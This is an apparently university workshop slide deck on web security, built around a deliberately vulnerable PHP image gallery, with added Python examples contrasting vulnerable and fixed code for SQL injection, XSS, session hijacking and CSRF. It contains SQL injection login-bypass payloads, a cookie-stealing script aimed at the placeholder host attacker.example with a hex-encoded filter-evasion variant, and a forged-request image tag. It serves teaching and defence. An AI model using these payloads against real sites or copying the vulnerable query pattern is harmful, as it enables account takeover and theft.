Website-Security

Published on http://fg-informatik.unibas.ch/wiki/index.php/Website-Security

  1. fg.workshop
  2. (title slide, no text)
  3. > 200,000 credit card records stolen via SQL injection. > 40 million credit card records stored unencrypted.
  4. (title slide, no text)
  5. Web Security. "A good programmer is someone who always looks both ways before crossing a one-way street." (Doug Linder) Marcel Büchler, Ivan Giangreco
  6. fg.gallery: a gallery for uploading images; simple user management; users can rate images; PHP, MySQL
  7. Happy Hacking: find the security holes.
  8. fg.gallery, the weaknesses it contains (CWE names): SQL Injection; Information Exposure through an Error Message; Missing Authentication for Critical Function; Cross-Site Scripting; Cross-Site Request Forgery; Improper Access Control; Reliance on Untrusted Inputs (Spoofed HTTP Requests); Unrestricted Upload of File with Dangerous Type; Missing Encryption of Sensitive Data; Use of Hard-coded Credentials; Session Hijacking; Use of Blacklists instead of Whitelists
  9. SQL Injection
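The login check that slide 9 attacks, as an added example (not fg.gallery's code; Python with an in-memory sqlite3 table standing in for the deck's PHP/MySQL). The table, the user names and the payloads are constructed for the demo. The vulnerable variant builds the statement by string concatenation; the fixed variant binds the values as parameters, so a quote in the input can never close the string literal and alter the query's grammar:

```python
import sqlite3

def make_db():
    """Constructed demo database: the users table behind a login form."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    db.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    db.commit()
    return db

def login_vulnerable(db, name, password):
    """Concatenation: attacker text becomes part of the SQL statement itself."""
    query = ("SELECT name FROM users WHERE name = '" + name +
             "' AND password = '" + password + "'")
    row = db.execute(query).fetchone()
    return row[0] if row else None

def login_safe(db, name, password):
    """Placeholders: the statement text is fixed, values travel separately."""
    row = db.execute("SELECT name FROM users WHERE name = ? AND password = ?",
                     (name, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    # password = ' OR '1'='1  turns the WHERE clause into
    # (name='anything' AND password='') OR '1'='1', true for every row
    print(login_vulnerable(db, "anything", "' OR '1'='1"))   # alice
    print(login_safe(db, "anything", "' OR '1'='1"))         # None
    # name = alice'--  comments out the password check entirely
    print(login_vulnerable(db, "alice'--", "wrong"))         # alice
    print(login_safe(db, "alice'--", "wrong"))               # None
```

The same two payloads work against MySQL with the PHP string-building pattern; the fix there is prepared statements (PDO or mysqli with bound parameters), not escaping by hand. Note also that the deck's slide 3 case (card data stored unencrypted) makes any such injection far worse, since the query result is immediately usable.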
  10. Cross-Site Scripting (XSS). The cookie is sent to a foreign server! And the same, hex-encoded:
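An added example (not fg.gallery's code) of what slide 10 shows, tied to the "blacklists instead of whitelists" item on slide 8: a stored comment that sends the viewer's cookie to a foreign server, the same payload hex- (percent-) encoded, and why a keyword blacklist fails where output escaping holds. The host attacker.example is a placeholder, and the assumption that the application URL-decodes the stored comment when rendering it is this example's, not the deck's:

```python
import html
from urllib.parse import unquote

# Constructed payload of the kind on the slide: redirect the victim's browser
# to an attacker-controlled host with document.cookie in the query string.
PAYLOAD = ("<script>document.location="
           "'http://attacker.example/steal?c='+document.cookie</script>")

def hex_encode(text):
    """Percent-encode every byte as %XX: the 'same thing, hex-coded' from the slide."""
    return "".join("%%%02X" % b for b in text.encode("utf-8"))

def blacklist_filter(comment):
    """Input blacklist as warned against on slide 8. Returns None if rejected."""
    lowered = comment.lower()
    for bad in ("<script", "javascript:", "onerror=", "onload="):
        if bad in lowered:
            return None
    return comment

def render_comment_unsafe(stored):
    # Decodes the stored value and inlines it verbatim into the page.
    return "<p class=\"comment\">" + unquote(stored) + "</p>"

def render_comment_safe(stored):
    # Decode first, then escape for the HTML text context at output time
    # (PHP equivalent: htmlspecialchars with ENT_QUOTES). The comment stays
    # data regardless of what any input filter did or did not catch.
    return "<p class=\"comment\">" + html.escape(unquote(stored), quote=True) + "</p>"

def is_script_live(rendered):
    """True if the rendered markup contains an executable <script> tag."""
    return "<script>" in rendered.lower()

if __name__ == "__main__":
    print(blacklist_filter(PAYLOAD))                        # None: plain payload rejected
    encoded = hex_encode(PAYLOAD)
    print(blacklist_filter(encoded) is not None)            # True: encoded payload passes
    print(is_script_live(render_comment_unsafe(encoded)))   # True: script executes
    print(is_script_live(render_comment_safe(encoded)))     # False: rendered as text
```

The blacklist matches the literal string "<script" and never sees it because the bytes arrive as %3C%73%63..., while the render path decodes them back into live markup. Escaping at the point of output does not depend on recognising the attack, which is why it is the whitelist-style fix.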
  11. Session Hijacking
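For slide 11, an added example (not fg.gallery's code) of the server-side controls that blunt session hijacking: an unguessable id, a fresh id issued at login so a planted or sniffed pre-login id is worthless afterwards, an idle timeout, and cookie attributes that keep the id away from script and off plain HTTP. The cookie name PHPSESSID is assumed (PHP's default); time is passed in explicitly so the behaviour is reproducible:

```python
import secrets
import time

class SessionStore:
    """Minimal server-side session store (added example, not the app's code)."""

    def __init__(self, ttl=1800):
        self.ttl = ttl                # idle lifetime in seconds
        self._sessions = {}           # sid -> {"user": ..., "seen": ...}

    def create(self, user=None, now=None):
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)       # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": user, "seen": now}
        return sid

    def get(self, sid, now=None):
        """Return the session dict, or None if unknown or idle too long."""
        now = time.time() if now is None else now
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        if now - sess["seen"] > self.ttl:
            del self._sessions[sid]           # stale ids stop working
            return None
        sess["seen"] = now
        return sess

    def login(self, old_sid, user, now=None):
        """Rotate the id at privilege change: an id the attacker planted
        (session fixation) or captured before login no longer maps to anything."""
        self._sessions.pop(old_sid, None)
        return self.create(user, now)

    def logout(self, sid):
        self._sessions.pop(sid, None)

def set_cookie_header(sid):
    # HttpOnly: not readable via document.cookie, so the XSS on the previous
    # slide cannot exfiltrate it; Secure: never sent over plain HTTP where it
    # could be sniffed; SameSite=Lax: not attached to cross-site subrequests.
    return f"Set-Cookie: PHPSESSID={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"

def sid_looks_weak(sid):
    """Crude check for ids an attacker can guess: short, or purely numeric
    (a counter or timestamp), the classic shortcut to someone else's session."""
    return len(sid) < 16 or sid.isdigit()

if __name__ == "__main__":
    store = SessionStore(ttl=10)
    anon = store.create(now=1000)             # pre-login id, assume attacker knows it
    sid = store.login(anon, "alice", now=1001)
    print(store.get(anon, now=1002))          # None: the known id is dead
    print(store.get(sid, now=1002)["user"])   # alice
    print(set_cookie_header(sid))
```

In PHP the equivalents are session_regenerate_id(true) after a successful login and session.cookie_httponly / session.cookie_secure in the ini settings; the point of the example is the order of operations, not the storage.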
  12. Cross-Site Request Forgery (CSRF). The user logs in: HTTP Request, HTTP Response, Logged in.
  13. Cross-Site Request Forgery (CSRF). The comment form ("Comment as you like. Comment:"): HTTP Request, HTTP Response.
  14. Cross-Site Request Forgery (CSRF). The comment submitted is <img src="http://www.server.de/buy.php?num_of_stocks=1000"/>: HTTP Request, HTTP Response.
  15. Cross-Site Request Forgery (CSRF). Logged in: HTTP Request, then a second HTTP Request to http://www.server.de/buy.php?num_of_stocks=1000.
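The sequence on slides 12 to 15, as an added example (not fg.gallery's code): buy.php is modelled as a Python function so the forged request produced by the <img> tag and a legitimate purchase can be run side by side. The session dict, the hidden field name csrf_token and the synchronizer-token check are assumptions of this example; the URL and parameter come from the slides:

```python
import hmac
import secrets
from urllib.parse import parse_qs

def new_csrf_token():
    """Per-session secret; the attacker's page cannot read it (same-origin policy)."""
    return secrets.token_urlsafe(32)

def render_buy_form(session):
    """The legitimate form carries the session's token as a hidden field."""
    return ('<form method="post" action="/buy.php">'
            f'<input type="hidden" name="csrf_token" value="{session["csrf_token"]}">'
            '<input type="number" name="num_of_stocks">'
            '<input type="submit" value="Buy"></form>')

def handle_buy(method, params, session):
    """Simulated buy.php. params is the raw query string (GET) or body (POST).
    Returns (HTTP status, message)."""
    if session.get("user") is None:
        return 401, "not logged in"
    if method != "POST":
        # The <img> on slide 14 makes the victim's browser issue a GET with the
        # victim's session cookie attached. State changes must never hang off GET.
        return 405, "state-changing request must be POST"
    form = parse_qs(params)
    sent = form.get("csrf_token", [""])[0]
    expected = session.get("csrf_token", "")
    # Both must be non-empty: compare_digest("", "") would be True.
    if not sent or not expected or not hmac.compare_digest(sent, expected):
        return 403, "missing or invalid CSRF token"
    n = int(form.get("num_of_stocks", ["0"])[0])
    session["stocks"] = session.get("stocks", 0) + n
    return 200, f"bought {n} stocks"

def csrf_scenario():
    """Victim is logged in (slide 12); attacker's comment holds the <img> (slide 14).
    Returns the status of each request and the victim's final stock count."""
    victim = {"user": "alice", "csrf_token": new_csrf_token(), "stocks": 0}
    forged_get = handle_buy("GET", "num_of_stocks=1000", victim)          # slide 15
    forged_post = handle_buy("POST", "num_of_stocks=1000", victim)        # auto-submitting form, no token
    guessed = handle_buy("POST", "num_of_stocks=1000&csrf_token=" + new_csrf_token(), victim)
    legit = handle_buy("POST", "num_of_stocks=5&csrf_token=" + victim["csrf_token"], victim)
    return forged_get[0], forged_post[0], guessed[0], legit[0], victim["stocks"]

if __name__ == "__main__":
    print(csrf_scenario())   # (405, 403, 403, 200, 5)
```

Without the check, the GET on slide 15 succeeds because the browser adds the victim's cookie automatically; rejecting GET alone is not enough, since a hidden auto-submitting form sends a POST just as easily, hence the token. A SameSite cookie attribute, as in the session example above, is a second layer, not a replacement.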
  16. http://cwe.mitre.org/top25/ and http://phpsec.org/projects/guide/
  17. Q&A
